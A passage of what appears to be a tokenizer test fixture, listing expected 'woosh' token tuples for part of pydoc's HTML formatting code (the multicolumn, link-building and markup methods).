woosh.Token(woosh.INDENT, ' ', 616, 0, 616, 8),
woosh.Token(woosh.STRING, '"""Format literal preformatted text."""', 616, 8, 616, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 616, 47, 617, 0),
woosh.Token(woosh.NAME, 'text', 617, 8, 617, 12),
woosh.Token(woosh.OP, '=', 617, 13, 617, 14),
woosh.Token(woosh.NAME, 'self', 617, 15, 617, 19),
woosh.Token(woosh.OP, '.', 617, 19, 617, 20),
woosh.Token(woosh.NAME, 'escape', 617, 20, 617, 26),
woosh.Token(woosh.OP, '(', 617, 26, 617, 27),
woosh.Token(woosh.NAME, 'text', 617, 27, 617, 31),
woosh.Token(woosh.OP, '.', 617, 31, 617, 32),
woosh.Token(woosh.NAME, 'expandtabs', 617, 32, 617, 42),
woosh.Token(woosh.OP, '(', 617, 42, 617, 43),
woosh.Token(woosh.OP, ')', 617, 43, 617, 44),
woosh.Token(woosh.OP, ')', 617, 44, 617, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 617, 45, 618, 0),
woosh.Token(woosh.NAME, 'return', 618, 8, 618, 14),
woosh.Token(woosh.NAME, 'replace', 618, 15, 618, 22),
woosh.Token(woosh.OP, '(', 618, 22, 618, 23),
woosh.Token(woosh.NAME, 'text', 618, 23, 618, 27),
woosh.Token(woosh.OP, ',', 618, 27, 618, 28),
woosh.Token(woosh.STRING, "'\\n\\n'", 618, 29, 618, 35),
woosh.Token(woosh.OP, ',', 618, 35, 618, 36),
woosh.Token(woosh.STRING, "'\\n \\n'", 618, 37, 618, 44),
woosh.Token(woosh.OP, ',', 618, 44, 618, 45),
woosh.Token(woosh.STRING, "'\\n\\n'", 618, 46, 618, 52),
woosh.Token(woosh.OP, ',', 618, 52, 618, 53),
woosh.Token(woosh.STRING, "'\\n \\n'", 618, 54, 618, 61),
woosh.Token(woosh.OP, ',', 618, 61, 618, 62),
woosh.Token(woosh.STRING, "' '", 619, 29, 619, 32),
woosh.Token(woosh.OP, ',', 619, 32, 619, 33),
woosh.Token(woosh.STRING, "' '", 619, 34, 619, 42),
woosh.Token(woosh.OP, ',', 619, 42, 619, 43),
woosh.Token(woosh.STRING, "'\\n'", 619, 44, 619, 48),
woosh.Token(woosh.OP, ',', 619, 48, 619, 49),
woosh.Token(woosh.STRING, "'<br>\\n'", 619, 50, 619, 58),
woosh.Token(woosh.OP, ')', 619, 58, 619, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 619, 59, 620, 0),
woosh.Token(woosh.DEDENT, ' ', 621, 0, 621, 4),
woosh.Token(woosh.NAME, 'def', 621, 4, 621, 7),
woosh.Token(woosh.NAME, 'multicolumn', 621, 8, 621, 19),
woosh.Token(woosh.OP, '(', 621, 19, 621, 20),
woosh.Token(woosh.NAME, 'self', 621, 20, 621, 24),
woosh.Token(woosh.OP, ',', 621, 24, 621, 25),
woosh.Token(woosh.NAME, 'list', 621, 26, 621, 30),
woosh.Token(woosh.OP, ',', 621, 30, 621, 31),
woosh.Token(woosh.NAME, 'format', 621, 32, 621, 38),
woosh.Token(woosh.OP, ',', 621, 38, 621, 39),
woosh.Token(woosh.NAME, 'cols', 621, 40, 621, 44),
woosh.Token(woosh.OP, '=', 621, 44, 621, 45),
woosh.Token(woosh.NUMBER, '4', 621, 45, 621, 46),
woosh.Token(woosh.OP, ')', 621, 46, 621, 47),
woosh.Token(woosh.OP, ':', 621, 47, 621, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 621, 48, 622, 0),
woosh.Token(woosh.INDENT, ' ', 622, 0, 622, 8),
woosh.Token(woosh.STRING, '"""Format a list of items into a multi-column list."""', 622, 8, 622, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 622, 62, 623, 0),
woosh.Token(woosh.NAME, 'result', 623, 8, 623, 14),
woosh.Token(woosh.OP, '=', 623, 15, 623, 16),
woosh.Token(woosh.STRING, "''", 623, 17, 623, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 623, 19, 624, 0),
woosh.Token(woosh.NAME, 'rows', 624, 8, 624, 12),
woosh.Token(woosh.OP, '=', 624, 13, 624, 14),
woosh.Token(woosh.OP, '(', 624, 15, 624, 16),
woosh.Token(woosh.NAME, 'len', 624, 16, 624, 19),
woosh.Token(woosh.OP, '(', 624, 19, 624, 20),
woosh.Token(woosh.NAME, 'list', 624, 20, 624, 24),
woosh.Token(woosh.OP, ')', 624, 24, 624, 25),
woosh.Token(woosh.OP, '+', 624, 25, 624, 26),
woosh.Token(woosh.NAME, 'cols', 624, 26, 624, 30),
woosh.Token(woosh.OP, '-', 624, 30, 624, 31),
woosh.Token(woosh.NUMBER, '1', 624, 31, 624, 32),
woosh.Token(woosh.OP, ')', 624, 32, 624, 33),
woosh.Token(woosh.OP, '//', 624, 33, 624, 35),
woosh.Token(woosh.NAME, 'cols', 624, 35, 624, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 624, 39, 625, 0),
woosh.Token(woosh.NAME, 'for', 625, 8, 625, 11),
woosh.Token(woosh.NAME, 'col', 625, 12, 625, 15),
woosh.Token(woosh.NAME, 'in', 625, 16, 625, 18),
woosh.Token(woosh.NAME, 'range', 625, 19, 625, 24),
woosh.Token(woosh.OP, '(', 625, 24, 625, 25),
woosh.Token(woosh.NAME, 'cols', 625, 25, 625, 29),
woosh.Token(woosh.OP, ')', 625, 29, 625, 30),
woosh.Token(woosh.OP, ':', 625, 30, 625, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 625, 31, 626, 0),
woosh.Token(woosh.INDENT, ' ', 626, 0, 626, 12),
woosh.Token(woosh.NAME, 'result', 626, 12, 626, 18),
woosh.Token(woosh.OP, '=', 626, 19, 626, 20),
woosh.Token(woosh.NAME, 'result', 626, 21, 626, 27),
woosh.Token(woosh.OP, '+', 626, 28, 626, 29),
woosh.Token(woosh.STRING, '\'<td width="%d%%" valign=top>\'', 626, 30, 626, 60),
woosh.Token(woosh.OP, '%', 626, 61, 626, 62),
woosh.Token(woosh.OP, '(', 626, 63, 626, 64),
woosh.Token(woosh.NUMBER, '100', 626, 64, 626, 67),
woosh.Token(woosh.OP, '//', 626, 67, 626, 69),
woosh.Token(woosh.NAME, 'cols', 626, 69, 626, 73),
woosh.Token(woosh.OP, ')', 626, 73, 626, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 626, 74, 627, 0),
woosh.Token(woosh.NAME, 'for', 627, 12, 627, 15),
woosh.Token(woosh.NAME, 'i', 627, 16, 627, 17),
woosh.Token(woosh.NAME, 'in', 627, 18, 627, 20),
woosh.Token(woosh.NAME, 'range', 627, 21, 627, 26),
woosh.Token(woosh.OP, '(', 627, 26, 627, 27),
woosh.Token(woosh.NAME, 'rows', 627, 27, 627, 31),
woosh.Token(woosh.OP, '*', 627, 31, 627, 32),
woosh.Token(woosh.NAME, 'col', 627, 32, 627, 35),
woosh.Token(woosh.OP, ',', 627, 35, 627, 36),
woosh.Token(woosh.NAME, 'rows', 627, 37, 627, 41),
woosh.Token(woosh.OP, '*', 627, 41, 627, 42),
woosh.Token(woosh.NAME, 'col', 627, 42, 627, 45),
woosh.Token(woosh.OP, '+', 627, 45, 627, 46),
woosh.Token(woosh.NAME, 'rows', 627, 46, 627, 50),
woosh.Token(woosh.OP, ')', 627, 50, 627, 51),
woosh.Token(woosh.OP, ':', 627, 51, 627, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 627, 52, 628, 0),
woosh.Token(woosh.INDENT, ' ', 628, 0, 628, 16),
woosh.Token(woosh.NAME, 'if', 628, 16, 628, 18),
woosh.Token(woosh.NAME, 'i', 628, 19, 628, 20),
woosh.Token(woosh.OP, '<', 628, 21, 628, 22),
woosh.Token(woosh.NAME, 'len', 628, 23, 628, 26),
woosh.Token(woosh.OP, '(', 628, 26, 628, 27),
woosh.Token(woosh.NAME, 'list', 628, 27, 628, 31),
woosh.Token(woosh.OP, ')', 628, 31, 628, 32),
woosh.Token(woosh.OP, ':', 628, 32, 628, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 628, 33, 629, 0),
woosh.Token(woosh.INDENT, ' ', 629, 0, 629, 20),
woosh.Token(woosh.NAME, 'result', 629, 20, 629, 26),
woosh.Token(woosh.OP, '=', 629, 27, 629, 28),
woosh.Token(woosh.NAME, 'result', 629, 29, 629, 35),
woosh.Token(woosh.OP, '+', 629, 36, 629, 37),
woosh.Token(woosh.NAME, 'format', 629, 38, 629, 44),
woosh.Token(woosh.OP, '(', 629, 44, 629, 45),
woosh.Token(woosh.NAME, 'list', 629, 45, 629, 49),
woosh.Token(woosh.OP, '[', 629, 49, 629, 50),
woosh.Token(woosh.NAME, 'i', 629, 50, 629, 51),
woosh.Token(woosh.OP, ']', 629, 51, 629, 52),
woosh.Token(woosh.OP, ')', 629, 52, 629, 53),
woosh.Token(woosh.OP, '+', 629, 54, 629, 55),
woosh.Token(woosh.STRING, "'<br>\\n'", 629, 56, 629, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 629, 64, 630, 0),
woosh.Token(woosh.DEDENT, ' ', 630, 0, 630, 12),
woosh.Token(woosh.DEDENT, '', 630, 12, 630, 12),
woosh.Token(woosh.NAME, 'result', 630, 12, 630, 18),
woosh.Token(woosh.OP, '=', 630, 19, 630, 20),
woosh.Token(woosh.NAME, 'result', 630, 21, 630, 27),
woosh.Token(woosh.OP, '+', 630, 28, 630, 29),
woosh.Token(woosh.STRING, "'</td>'", 630, 30, 630, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 630, 37, 631, 0),
woosh.Token(woosh.DEDENT, ' ', 631, 0, 631, 8),
woosh.Token(woosh.NAME, 'return', 631, 8, 631, 14),
woosh.Token(woosh.STRING, '\'<table width="100%%" summary="list"><tr>%s</tr></table>\'', 631, 15, 631, 72),
woosh.Token(woosh.OP, '%', 631, 73, 631, 74),
woosh.Token(woosh.NAME, 'result', 631, 75, 631, 81),
woosh.Token(woosh.NEWLINE, '\r\n', 631, 81, 632, 0),
woosh.Token(woosh.DEDENT, ' ', 633, 0, 633, 4),
woosh.Token(woosh.NAME, 'def', 633, 4, 633, 7),
woosh.Token(woosh.NAME, 'grey', 633, 8, 633, 12),
woosh.Token(woosh.OP, '(', 633, 12, 633, 13),
woosh.Token(woosh.NAME, 'self', 633, 13, 633, 17),
woosh.Token(woosh.OP, ',', 633, 17, 633, 18),
woosh.Token(woosh.NAME, 'text', 633, 19, 633, 23),
woosh.Token(woosh.OP, ')', 633, 23, 633, 24),
woosh.Token(woosh.OP, ':', 633, 24, 633, 25),
woosh.Token(woosh.NAME, 'return', 633, 26, 633, 32),
woosh.Token(woosh.STRING, '\'<font color="#909090">%s</font>\'', 633, 33, 633, 66),
woosh.Token(woosh.OP, '%', 633, 67, 633, 68),
woosh.Token(woosh.NAME, 'text', 633, 69, 633, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 633, 73, 634, 0),
woosh.Token(woosh.NAME, 'def', 635, 4, 635, 7),
woosh.Token(woosh.NAME, 'namelink', 635, 8, 635, 16),
woosh.Token(woosh.OP, '(', 635, 16, 635, 17),
woosh.Token(woosh.NAME, 'self', 635, 17, 635, 21),
woosh.Token(woosh.OP, ',', 635, 21, 635, 22),
woosh.Token(woosh.NAME, 'name', 635, 23, 635, 27),
woosh.Token(woosh.OP, ',', 635, 27, 635, 28),
woosh.Token(woosh.OP, '*', 635, 29, 635, 30),
woosh.Token(woosh.NAME, 'dicts', 635, 30, 635, 35),
woosh.Token(woosh.OP, ')', 635, 35, 635, 36),
woosh.Token(woosh.OP, ':', 635, 36, 635, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 635, 37, 636, 0),
woosh.Token(woosh.INDENT, ' ', 636, 0, 636, 8),
woosh.Token(woosh.STRING, '"""Make a link for an identifier, given name-to-URL mappings."""', 636, 8, 636, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 636, 72, 637, 0),
woosh.Token(woosh.NAME, 'for', 637, 8, 637, 11),
woosh.Token(woosh.NAME, 'dict', 637, 12, 637, 16),
woosh.Token(woosh.NAME, 'in', 637, 17, 637, 19),
woosh.Token(woosh.NAME, 'dicts', 637, 20, 637, 25),
woosh.Token(woosh.OP, ':', 637, 25, 637, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 637, 26, 638, 0),
woosh.Token(woosh.INDENT, ' ', 638, 0, 638, 12),
woosh.Token(woosh.NAME, 'if', 638, 12, 638, 14),
woosh.Token(woosh.NAME, 'name', 638, 15, 638, 19),
woosh.Token(woosh.NAME, 'in', 638, 20, 638, 22),
woosh.Token(woosh.NAME, 'dict', 638, 23, 638, 27),
woosh.Token(woosh.OP, ':', 638, 27, 638, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 638, 28, 639, 0),
woosh.Token(woosh.INDENT, ' ', 639, 0, 639, 16),
woosh.Token(woosh.NAME, 'return', 639, 16, 639, 22),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 639, 23, 639, 44),
woosh.Token(woosh.OP, '%', 639, 45, 639, 46),
woosh.Token(woosh.OP, '(', 639, 47, 639, 48),
woosh.Token(woosh.NAME, 'dict', 639, 48, 639, 52),
woosh.Token(woosh.OP, '[', 639, 52, 639, 53),
woosh.Token(woosh.NAME, 'name', 639, 53, 639, 57),
woosh.Token(woosh.OP, ']', 639, 57, 639, 58),
woosh.Token(woosh.OP, ',', 639, 58, 639, 59),
woosh.Token(woosh.NAME, 'name', 639, 60, 639, 64),
woosh.Token(woosh.OP, ')', 639, 64, 639, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 639, 65, 640, 0),
woosh.Token(woosh.DEDENT, ' ', 640, 0, 640, 8),
woosh.Token(woosh.DEDENT, '', 640, 8, 640, 8),
woosh.Token(woosh.NAME, 'return', 640, 8, 640, 14),
woosh.Token(woosh.NAME, 'name', 640, 15, 640, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 640, 19, 641, 0),
woosh.Token(woosh.DEDENT, ' ', 642, 0, 642, 4),
woosh.Token(woosh.NAME, 'def', 642, 4, 642, 7),
woosh.Token(woosh.NAME, 'classlink', 642, 8, 642, 17),
woosh.Token(woosh.OP, '(', 642, 17, 642, 18),
woosh.Token(woosh.NAME, 'self', 642, 18, 642, 22),
woosh.Token(woosh.OP, ',', 642, 22, 642, 23),
woosh.Token(woosh.NAME, 'object', 642, 24, 642, 30),
woosh.Token(woosh.OP, ',', 642, 30, 642, 31),
woosh.Token(woosh.NAME, 'modname', 642, 32, 642, 39),
woosh.Token(woosh.OP, ')', 642, 39, 642, 40),
woosh.Token(woosh.OP, ':', 642, 40, 642, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 642, 41, 643, 0),
woosh.Token(woosh.INDENT, ' ', 643, 0, 643, 8),
woosh.Token(woosh.STRING, '"""Make a link for a class."""', 643, 8, 643, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 643, 38, 644, 0),
woosh.Token(woosh.NAME, 'name', 644, 8, 644, 12),
woosh.Token(woosh.OP, ',', 644, 12, 644, 13),
woosh.Token(woosh.NAME, 'module', 644, 14, 644, 20),
woosh.Token(woosh.OP, '=', 644, 21, 644, 22),
woosh.Token(woosh.NAME, 'object', 644, 23, 644, 29),
woosh.Token(woosh.OP, '.', 644, 29, 644, 30),
woosh.Token(woosh.NAME, '__name__', 644, 30, 644, 38),
woosh.Token(woosh.OP, ',', 644, 38, 644, 39),
woosh.Token(woosh.NAME, 'sys', 644, 40, 644, 43),
woosh.Token(woosh.OP, '.', 644, 43, 644, 44),
woosh.Token(woosh.NAME, 'modules', 644, 44, 644, 51),
woosh.Token(woosh.OP, '.', 644, 51, 644, 52),
woosh.Token(woosh.NAME, 'get', 644, 52, 644, 55),
woosh.Token(woosh.OP, '(', 644, 55, 644, 56),
woosh.Token(woosh.NAME, 'object', 644, 56, 644, 62),
woosh.Token(woosh.OP, '.', 644, 62, 644, 63),
woosh.Token(woosh.NAME, '__module__', 644, 63, 644, 73),
woosh.Token(woosh.OP, ')', 644, 73, 644, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 644, 74, 645, 0),
woosh.Token(woosh.NAME, 'if', 645, 8, 645, 10),
woosh.Token(woosh.NAME, 'hasattr', 645, 11, 645, 18),
woosh.Token(woosh.OP, '(', 645, 18, 645, 19),
woosh.Token(woosh.NAME, 'module', 645, 19, 645, 25),
woosh.Token(woosh.OP, ',', 645, 25, 645, 26),
woosh.Token(woosh.NAME, 'name', 645, 27, 645, 31),
woosh.Token(woosh.OP, ')', 645, 31, 645, 32),
woosh.Token(woosh.NAME, 'and', 645, 33, 645, 36),
woosh.Token(woosh.NAME, 'getattr', 645, 37, 645, 44),
woosh.Token(woosh.OP, '(', 645, 44, 645, 45),
woosh.Token(woosh.NAME, 'module', 645, 45, 645, 51),
woosh.Token(woosh.OP, ',', 645, 51, 645, 52),
woosh.Token(woosh.NAME, 'name', 645, 53, 645, 57),
woosh.Token(woosh.OP, ')', 645, 57, 645, 58),
woosh.Token(woosh.NAME, 'is', 645, 59, 645, 61),
woosh.Token(woosh.NAME, 'object', 645, 62, 645, 68),
woosh.Token(woosh.OP, ':', 645, 68, 645, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 645, 69, 646, 0),
woosh.Token(woosh.INDENT, ' ', 646, 0, 646, 12),
woosh.Token(woosh.NAME, 'return', 646, 12, 646, 18),
woosh.Token(woosh.STRING, '\'<a href="%s.html#%s">%s</a>\'', 646, 19, 646, 48),
woosh.Token(woosh.OP, '%', 646, 49, 646, 50),
woosh.Token(woosh.OP, '(', 646, 51, 646, 52),
woosh.Token(woosh.NAME, 'module', 647, 16, 647, 22),
woosh.Token(woosh.OP, '.', 647, 22, 647, 23),
woosh.Token(woosh.NAME, '__name__', 647, 23, 647, 31),
woosh.Token(woosh.OP, ',', 647, 31, 647, 32),
woosh.Token(woosh.NAME, 'name', 647, 33, 647, 37),
woosh.Token(woosh.OP, ',', 647, 37, 647, 38),
woosh.Token(woosh.NAME, 'classname', 647, 39, 647, 48),
woosh.Token(woosh.OP, '(', 647, 48, 647, 49),
woosh.Token(woosh.NAME, 'object', 647, 49, 647, 55),
woosh.Token(woosh.OP, ',', 647, 55, 647, 56),
woosh.Token(woosh.NAME, 'modname', 647, 57, 647, 64),
woosh.Token(woosh.OP, ')', 647, 64, 647, 65),
woosh.Token(woosh.OP, ')', 647, 65, 647, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 647, 66, 648, 0),
woosh.Token(woosh.DEDENT, ' ', 648, 0, 648, 8),
woosh.Token(woosh.NAME, 'return', 648, 8, 648, 14),
woosh.Token(woosh.NAME, 'classname', 648, 15, 648, 24),
woosh.Token(woosh.OP, '(', 648, 24, 648, 25),
woosh.Token(woosh.NAME, 'object', 648, 25, 648, 31),
woosh.Token(woosh.OP, ',', 648, 31, 648, 32),
woosh.Token(woosh.NAME, 'modname', 648, 33, 648, 40),
woosh.Token(woosh.OP, ')', 648, 40, 648, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 648, 41, 649, 0),
woosh.Token(woosh.DEDENT, ' ', 650, 0, 650, 4),
woosh.Token(woosh.NAME, 'def', 650, 4, 650, 7),
woosh.Token(woosh.NAME, 'modulelink', 650, 8, 650, 18),
woosh.Token(woosh.OP, '(', 650, 18, 650, 19),
woosh.Token(woosh.NAME, 'self', 650, 19, 650, 23),
woosh.Token(woosh.OP, ',', 650, 23, 650, 24),
woosh.Token(woosh.NAME, 'object', 650, 25, 650, 31),
woosh.Token(woosh.OP, ')', 650, 31, 650, 32),
woosh.Token(woosh.OP, ':', 650, 32, 650, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 650, 33, 651, 0),
woosh.Token(woosh.INDENT, ' ', 651, 0, 651, 8),
woosh.Token(woosh.STRING, '"""Make a link for a module."""', 651, 8, 651, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 651, 39, 652, 0),
woosh.Token(woosh.NAME, 'return', 652, 8, 652, 14),
woosh.Token(woosh.STRING, '\'<a href="%s.html">%s</a>\'', 652, 15, 652, 41),
woosh.Token(woosh.OP, '%', 652, 42, 652, 43),
woosh.Token(woosh.OP, '(', 652, 44, 652, 45),
woosh.Token(woosh.NAME, 'object', 652, 45, 652, 51),
woosh.Token(woosh.OP, '.', 652, 51, 652, 52),
woosh.Token(woosh.NAME, '__name__', 652, 52, 652, 60),
woosh.Token(woosh.OP, ',', 652, 60, 652, 61),
woosh.Token(woosh.NAME, 'object', 652, 62, 652, 68),
woosh.Token(woosh.OP, '.', 652, 68, 652, 69),
woosh.Token(woosh.NAME, '__name__', 652, 69, 652, 77),
woosh.Token(woosh.OP, ')', 652, 77, 652, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 652, 78, 653, 0),
woosh.Token(woosh.DEDENT, ' ', 654, 0, 654, 4),
woosh.Token(woosh.NAME, 'def', 654, 4, 654, 7),
woosh.Token(woosh.NAME, 'modpkglink', 654, 8, 654, 18),
woosh.Token(woosh.OP, '(', 654, 18, 654, 19),
woosh.Token(woosh.NAME, 'self', 654, 19, 654, 23),
woosh.Token(woosh.OP, ',', 654, 23, 654, 24),
woosh.Token(woosh.NAME, 'modpkginfo', 654, 25, 654, 35),
woosh.Token(woosh.OP, ')', 654, 35, 654, 36),
woosh.Token(woosh.OP, ':', 654, 36, 654, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 654, 37, 655, 0),
woosh.Token(woosh.INDENT, ' ', 655, 0, 655, 8),
woosh.Token(woosh.STRING, '"""Make a link for a module or package to display in an index."""', 655, 8, 655, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 655, 73, 656, 0),
woosh.Token(woosh.NAME, 'name', 656, 8, 656, 12),
woosh.Token(woosh.OP, ',', 656, 12, 656, 13),
woosh.Token(woosh.NAME, 'path', 656, 14, 656, 18),
woosh.Token(woosh.OP, ',', 656, 18, 656, 19),
woosh.Token(woosh.NAME, 'ispackage', 656, 20, 656, 29),
woosh.Token(woosh.OP, ',', 656, 29, 656, 30),
woosh.Token(woosh.NAME, 'shadowed', 656, 31, 656, 39),
woosh.Token(woosh.OP, '=', 656, 40, 656, 41),
woosh.Token(woosh.NAME, 'modpkginfo', 656, 42, 656, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 656, 52, 657, 0),
woosh.Token(woosh.NAME, 'if', 657, 8, 657, 10),
woosh.Token(woosh.NAME, 'shadowed', 657, 11, 657, 19),
woosh.Token(woosh.OP, ':', 657, 19, 657, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 657, 20, 658, 0),
woosh.Token(woosh.INDENT, ' ', 658, 0, 658, 12),
woosh.Token(woosh.NAME, 'return', 658, 12, 658, 18),
woosh.Token(woosh.NAME, 'self', 658, 19, 658, 23),
woosh.Token(woosh.OP, '.', 658, 23, 658, 24),
woosh.Token(woosh.NAME, 'grey', 658, 24, 658, 28),
woosh.Token(woosh.OP, '(', 658, 28, 658, 29),
woosh.Token(woosh.NAME, 'name', 658, 29, 658, 33),
woosh.Token(woosh.OP, ')', 658, 33, 658, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 658, 34, 659, 0),
woosh.Token(woosh.DEDENT, ' ', 659, 0, 659, 8),
woosh.Token(woosh.NAME, 'if', 659, 8, 659, 10),
woosh.Token(woosh.NAME, 'path', 659, 11, 659, 15),
woosh.Token(woosh.OP, ':', 659, 15, 659, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 659, 16, 660, 0),
woosh.Token(woosh.INDENT, ' ', 660, 0, 660, 12),
woosh.Token(woosh.NAME, 'url', 660, 12, 660, 15),
woosh.Token(woosh.OP, '=', 660, 16, 660, 17),
woosh.Token(woosh.STRING, "'%s.%s.html'", 660, 18, 660, 30),
woosh.Token(woosh.OP, '%', 660, 31, 660, 32),
woosh.Token(woosh.OP, '(', 660, 33, 660, 34),
woosh.Token(woosh.NAME, 'path', 660, 34, 660, 38),
woosh.Token(woosh.OP, ',', 660, 38, 660, 39),
woosh.Token(woosh.NAME, 'name', 660, 40, 660, 44),
woosh.Token(woosh.OP, ')', 660, 44, 660, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 660, 45, 661, 0),
woosh.Token(woosh.DEDENT, ' ', 661, 0, 661, 8),
woosh.Token(woosh.NAME, 'else', 661, 8, 661, 12),
woosh.Token(woosh.OP, ':', 661, 12, 661, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 661, 13, 662, 0),
woosh.Token(woosh.INDENT, ' ', 662, 0, 662, 12),
woosh.Token(woosh.NAME, 'url', 662, 12, 662, 15),
woosh.Token(woosh.OP, '=', 662, 16, 662, 17),
woosh.Token(woosh.STRING, "'%s.html'", 662, 18, 662, 27),
woosh.Token(woosh.OP, '%', 662, 28, 662, 29),
woosh.Token(woosh.NAME, 'name', 662, 30, 662, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 662, 34, 663, 0),
woosh.Token(woosh.DEDENT, ' ', 663, 0, 663, 8),
woosh.Token(woosh.NAME, 'if', 663, 8, 663, 10),
woosh.Token(woosh.NAME, 'ispackage', 663, 11, 663, 20),
woosh.Token(woosh.OP, ':', 663, 20, 663, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 663, 21, 664, 0),
woosh.Token(woosh.INDENT, ' ', 664, 0, 664, 12),
woosh.Token(woosh.NAME, 'text', 664, 12, 664, 16),
woosh.Token(woosh.OP, '=', 664, 17, 664, 18),
woosh.Token(woosh.STRING, "'<strong>%s</strong> (package)'", 664, 19, 664, 55),
woosh.Token(woosh.OP, '%', 664, 56, 664, 57),
woosh.Token(woosh.NAME, 'name', 664, 58, 664, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 664, 62, 665, 0),
woosh.Token(woosh.DEDENT, ' ', 665, 0, 665, 8),
woosh.Token(woosh.NAME, 'else', 665, 8, 665, 12),
woosh.Token(woosh.OP, ':', 665, 12, 665, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 665, 13, 666, 0),
woosh.Token(woosh.INDENT, ' ', 666, 0, 666, 12),
woosh.Token(woosh.NAME, 'text', 666, 12, 666, 16),
woosh.Token(woosh.OP, '=', 666, 17, 666, 18),
woosh.Token(woosh.NAME, 'name', 666, 19, 666, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 666, 23, 667, 0),
woosh.Token(woosh.DEDENT, ' ', 667, 0, 667, 8),
woosh.Token(woosh.NAME, 'return', 667, 8, 667, 14),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 667, 15, 667, 36),
woosh.Token(woosh.OP, '%', 667, 37, 667, 38),
woosh.Token(woosh.OP, '(', 667, 39, 667, 40),
woosh.Token(woosh.NAME, 'url', 667, 40, 667, 43),
woosh.Token(woosh.OP, ',', 667, 43, 667, 44),
woosh.Token(woosh.NAME, 'text', 667, 45, 667, 49),
woosh.Token(woosh.OP, ')', 667, 49, 667, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 667, 50, 668, 0),
woosh.Token(woosh.DEDENT, ' ', 669, 0, 669, 4),
woosh.Token(woosh.NAME, 'def', 669, 4, 669, 7),
woosh.Token(woosh.NAME, 'filelink', 669, 8, 669, 16),
woosh.Token(woosh.OP, '(', 669, 16, 669, 17),
woosh.Token(woosh.NAME, 'self', 669, 17, 669, 21),
woosh.Token(woosh.OP, ',', 669, 21, 669, 22),
woosh.Token(woosh.NAME, 'url', 669, 23, 669, 26),
woosh.Token(woosh.OP, ',', 669, 26, 669, 27),
woosh.Token(woosh.NAME, 'path', 669, 28, 669, 32),
woosh.Token(woosh.OP, ')', 669, 32, 669, 33),
woosh.Token(woosh.OP, ':', 669, 33, 669, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 669, 34, 670, 0),
woosh.Token(woosh.INDENT, ' ', 670, 0, 670, 8),
woosh.Token(woosh.STRING, '"""Make a link to source file."""', 670, 8, 670, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 670, 41, 671, 0),
woosh.Token(woosh.NAME, 'return', 671, 8, 671, 14),
woosh.Token(woosh.STRING, '\'<a href="file:%s">%s</a>\'', 671, 15, 671, 41),
woosh.Token(woosh.OP, '%', 671, 42, 671, 43),
woosh.Token(woosh.OP, '(', 671, 44, 671, 45),
woosh.Token(woosh.NAME, 'url', 671, 45, 671, 48),
woosh.Token(woosh.OP, ',', 671, 48, 671, 49),
woosh.Token(woosh.NAME, 'path', 671, 50, 671, 54),
woosh.Token(woosh.OP, ')', 671, 54, 671, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 671, 55, 672, 0),
woosh.Token(woosh.DEDENT, ' ', 673, 0, 673, 4),
woosh.Token(woosh.NAME, 'def', 673, 4, 673, 7),
woosh.Token(woosh.NAME, 'markup', 673, 8, 673, 14),
woosh.Token(woosh.OP, '(', 673, 14, 673, 15),
woosh.Token(woosh.NAME, 'self', 673, 15, 673, 19),
woosh.Token(woosh.OP, ',', 673, 19, 673, 20),
woosh.Token(woosh.NAME, 'text', 673, 21, 673, 25),
woosh.Token(woosh.OP, ',', 673, 25, 673, 26),
woosh.Token(woosh.NAME, 'escape', 673, 27, 673, 33),
woosh.Token(woosh.OP, '=', 673, 33, 673, 34),
woosh.Token(woosh.NAME, 'None', 673, 34, 673, 38),
woosh.Token(woosh.OP, ',', 673, 38, 673, 39),
woosh.Token(woosh.NAME, 'funcs', 673, 40, 673, 45),
woosh.Token(woosh.OP, '=', 673, 45, 673, 46),
woosh.Token(woosh.OP, '{', 673, 46, 673, 47),
woosh.Token(woosh.OP, '}', 673, 47, 673, 48),
woosh.Token(woosh.OP, ',', 673, 48, 673, 49),
woosh.Token(woosh.NAME, 'classes', 673, 50, 673, 57),
woosh.Token(woosh.OP, '=', 673, 57, 673, 58),
woosh.Token(woosh.OP, '{', 673, 58, 673, 59),
